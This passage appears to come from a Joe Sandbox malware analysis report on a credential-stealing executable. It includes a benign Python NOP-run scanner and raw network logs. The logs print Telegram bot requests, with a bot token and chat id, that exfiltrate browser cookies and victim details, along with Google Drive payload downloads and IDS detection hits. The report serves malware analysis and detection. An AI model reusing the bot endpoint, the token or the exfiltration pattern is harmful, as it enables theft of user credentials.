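The rows above are hits from the "Found inlined nop instructions" heuristic: a run of at least four single-byte NOPs (0x90) inside a function, reported together with the instruction that follows and, for a jmp, its resolved target. The scanner below is an added example of that heuristic (not Joe Sandbox's detector) written to be dependency-free: it decodes only the short (EB rel8) and near (E9 rel32) jmp forms and reports any other follower by its first opcode byte. The byte buffer and its load address are constructed for the example and are not taken from the sample.

```python
"""Scan a code buffer for runs of inlined single-byte NOPs (0x90) and report what
follows them, resolving short/near jmp targets. Added example, not the sandbox's own
detector. The byte string below is constructed for the example and its load address
is an assumption; EB rel8 and E9 rel32 are the only instructions it decodes, anything
else is reported by its first opcode byte."""
import struct
from typing import List, Tuple

NOP = 0x90


def find_nop_runs(code: bytes, base: int, min_nops: int = 4) -> List[Tuple[int, int, str]]:
    """Return (address_of_first_nop, nop_count, following_instruction) per qualifying run."""
    hits: List[Tuple[int, int, str]] = []
    i, n = 0, len(code)
    while i < n:
        if code[i] != NOP:
            i += 1
            continue
        start = i
        while i < n and code[i] == NOP:
            i += 1
        count = i - start
        if count < min_nops:
            continue                                  # short padding, ignore
        if i >= n:
            what = "end of buffer"
        elif code[i] == 0xEB and i + 2 <= n:          # jmp rel8: target = next_ip + rel8
            rel = struct.unpack_from("<b", code, i + 1)[0]
            what = f"jmp {(base + i + 2 + rel) & 0xFFFFFFFF:08X}h"
        elif code[i] == 0xE9 and i + 5 <= n:          # jmp rel32: target = next_ip + rel32
            rel = struct.unpack_from("<i", code, i + 1)[0]
            what = f"jmp {(base + i + 5 + rel) & 0xFFFFFFFF:08X}h"
        else:
            what = f"opcode {code[i]:02X}h"
        hits.append((base + start, count, what))
    return hits


def render(hits: List[Tuple[int, int, str]]) -> List[str]:
    """Format like the report's signature rows, e.g. '4x nop then jmp 076AEFBDh at 076AF009'."""
    return [f"{n}x nop then {what} at {addr:08X}" for addr, n, what in hits]


BASE = 0x076AF000   # assumed load address for the constructed buffer
SAMPLE = bytes.fromhex(
    "55 8BEC"                 # push ebp; mov ebp, esp
    "909090"                  # 3 NOPs: below the 4-NOP threshold, not reported
    "8B4508"                  # mov eax, [ebp+8]
    "90909090 EBAE"           # 4 NOPs then jmp rel8 backwards (-0x52) -> 076AEFBD
    "9090909090 E900010000"   # 5 NOPs then jmp rel32 +0x100 -> 076AF119
    "90909090 8BE5"           # 4 NOPs then mov esp, ebp (reported by opcode 8B)
    "5DC3"                    # pop ebp; ret
)

if __name__ == "__main__":
    for line in render(find_nop_runs(SAMPLE, BASE)):
        print(line)
```

A practitioner caveat: the hits in this report sit at JIT-style addresses (37D7xxxx, 37F6xxxx, 3A3Fxxxx), and just-in-time compilers also emit NOP padding for alignment, so a NOP run by itself is weak evidence of obfuscation. It carries weight here only in combination with the other behaviours listed in the report (custom stack, dynamic API resolution, the credential-theft and Telegram activity).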

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.11.20:49734 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.11.20:49733 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2007/03/2025%20/%2016:28:09%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7490462916:AAEz89H3J9AylfxjXRLV5diILDx9KkgRSME/sendDocument?chat_id=7160883909&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5d95116c0067Host: api.telegram.orgContent-Length: 2073
            Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
            Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49723 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49721 -> 142.251.46.174:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49726 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49731 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49728 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49729 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49732 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49725 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49727 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49730 -> 104.21.64.1:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ivLDAHuepFQ0Eiv_QNfq2F2eHEBNobhp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1ivLDAHuepFQ0Eiv_QNfq2F2eHEBNobhp&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.11.20:49724 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/102.129.252.156 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2007/03/2025%20/%2016:28:09%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: drive.google.com
Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot7490462916:AAEz89H3J9AylfxjXRLV5diILDx9KkgRSME/sendDocument?chat_id=7160883909&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd5d95116c0067 | Host: api.telegram.org | Content-Length: 2073
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Fri, 07 Mar 2025 21:28:12 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: unknown | HTTPS traffic detected: 142.251.46.174:443 -> 192.168.11.20:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.191.33:443 -> 192.168.11.20:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49733 version: TLS 1.2
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 0_2_00404FE3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 0_2_0040310B EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 12_2_0040310B EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | File created: C:\Windows\Fonts\Klud229
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | File created: C:\Windows\Fonts\Klud229\activism
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D74EC812_2_37D74EC8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7269012_2_37D72690
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D791C812_2_37D791C8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7185012_2_37D71850
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7FBD012_2_37D7FBD0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7FBC012_2_37D7FBC0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D793E812_2_37D793E8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D71F9812_2_37D71F98
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7F77812_2_37D7F778
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7F76812_2_37D7F768
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D70B2012_2_37D70B20
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7268112_2_37D72681
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D79AB812_2_37D79AB8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D74EB812_2_37D74EB8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D78A4012_2_37D78A40
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7ED9812_2_37D7ED98
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7ED8712_2_37D7ED87
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7004012_2_37D70040
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7184D12_2_37D7184D
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7001E12_2_37D7001E
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8719012_2_37D87190
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8AD4012_2_37D8AD40
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8A6E812_2_37D8A6E8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D875D812_2_37D875D8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8DFD812_2_37D8DFD8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D85FD012_2_37D85FD0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D899D012_2_37D899D0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D845C012_2_37D845C0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D85FC112_2_37D85FC1
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D815F812_2_37D815F8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D88FF812_2_37D88FF8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8BFF812_2_37D8BFF8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D82FF812_2_37D82FF8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D875E812_2_37D875E8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8DFE812_2_37D8DFE8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D815E812_2_37D815E8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D88FE812_2_37D88FE8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D899E012_2_37D899E0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8BFE712_2_37D8BFE7
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8ED9812_2_37D8ED98
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8CD9A12_2_37D8CD9A
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8119112_2_37D81191
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D88B9112_2_37D88B91
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8958812_2_37D89588
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8ED8A12_2_37D8ED8A
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8718012_2_37D87180
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D82BB012_2_37D82BB0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D845B012_2_37D845B0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8CDA812_2_37D8CDA8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D811A012_2_37D811A0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D88BA012_2_37D88BA0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D82BA012_2_37D82BA0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8275812_2_37D82758
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8DB5812_2_37D8DB58
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8415812_2_37D84158
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8BB5912_2_37D8BB59
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D80D4812_2_37D80D48
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8874812_2_37D88748
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8FB4812_2_37D8FB48
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8274912_2_37D82749
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8DB4912_2_37D8DB49
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D85B7812_2_37D85B78
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8957812_2_37D89578
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8416812_2_37D84168
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8BB6812_2_37D8BB68
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D85B6812_2_37D85B68
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8C91812_2_37D8C918
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D83D1012_2_37D83D10
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8571012_2_37D85710
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8E90812_2_37D8E908
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8C90812_2_37D8C908
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8230012_2_37D82300
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D83D0112_2_37D83D01
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D80D3812_2_37D80D38
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8873812_2_37D88738
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8FB3812_2_37D8FB38
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8AD3612_2_37D8AD36
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8572012_2_37D85720
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8B6D812_2_37D8B6D8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8A6D812_2_37D8A6D8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D852C812_2_37D852C8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8D6C812_2_37D8D6C8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8B6CA12_2_37D8B6CA
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8E8F812_2_37D8E8F8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D808F012_2_37D808F0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D882F012_2_37D882F0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D822F012_2_37D822F0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D882E012_2_37D882E0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D808E112_2_37D808E1
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8049812_2_37D80498
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D87E9812_2_37D87E98
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D81E9812_2_37D81E98
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8A29012_2_37D8A290
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8C48812_2_37D8C488
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8048812_2_37D80488
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D87E8912_2_37D87E89
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8A28012_2_37D8A280
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D838B812_2_37D838B8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8F6B812_2_37D8F6B8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D852B912_2_37D852B9
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8D6B912_2_37D8D6B9
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D81EA812_2_37D81EA8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D838A812_2_37D838A8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8F6A812_2_37D8F6A8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D81A5012_2_37D81A50
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8345112_2_37D83451
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8B24812_2_37D8B248
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8004012_2_37D80040
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D87A4012_2_37D87A40
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D81A4112_2_37D81A41
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8E47812_2_37D8E478
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8C47912_2_37D8C479
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D84E7012_2_37D84E70
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8E46912_2_37D8E469
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8346012_2_37D83460
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D84E6012_2_37D84E60
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D84A1812_2_37D84A18
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8641912_2_37D86419
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8001D12_2_37D8001D
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8F21712_2_37D8F217
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8300812_2_37D83008
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D84A0812_2_37D84A08
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D89E3812_2_37D89E38
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8D23812_2_37D8D238
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D87A3012_2_37D87A30
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8B23712_2_37D8B237
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8642812_2_37D86428
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8F22812_2_37D8F228
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D89E2A12_2_37D89E2A
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8D22712_2_37D8D227
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F661E812_2_37F661E8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6750812_2_37F67508
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F60DF012_2_37F60DF0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F68CF012_2_37F68CF0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6E2F112_2_37F6E2F1
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F61FF812_2_37F61FF8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6B7F812_2_37F6B7F8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F648F812_2_37F648F8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F674F812_2_37F674F8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6CFE012_2_37F6CFE0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F60DE012_2_37F60DE0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F68CE112_2_37F68CE1
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F61FEA12_2_37F61FEA
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F63FE812_2_37F63FE8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6FAE812_2_37F6FAE8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6B7E812_2_37F6B7E8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F604D012_2_37F604D0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F679D012_2_37F679D0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6CFD012_2_37F6CFD0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6A4D812_2_37F6A4D8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F63FD812_2_37F63FD8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F661D812_2_37F661D8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6FAD812_2_37F6FAD8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F636C212_2_37F636C2
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6BCC012_2_37F6BCC0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F636C812_2_37F636C8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6E7C812_2_37F6E7C8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6A4C812_2_37F6A4C8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F666B012_2_37F666B0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6BCB012_2_37F6BCB0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F604BF12_2_37F604BF
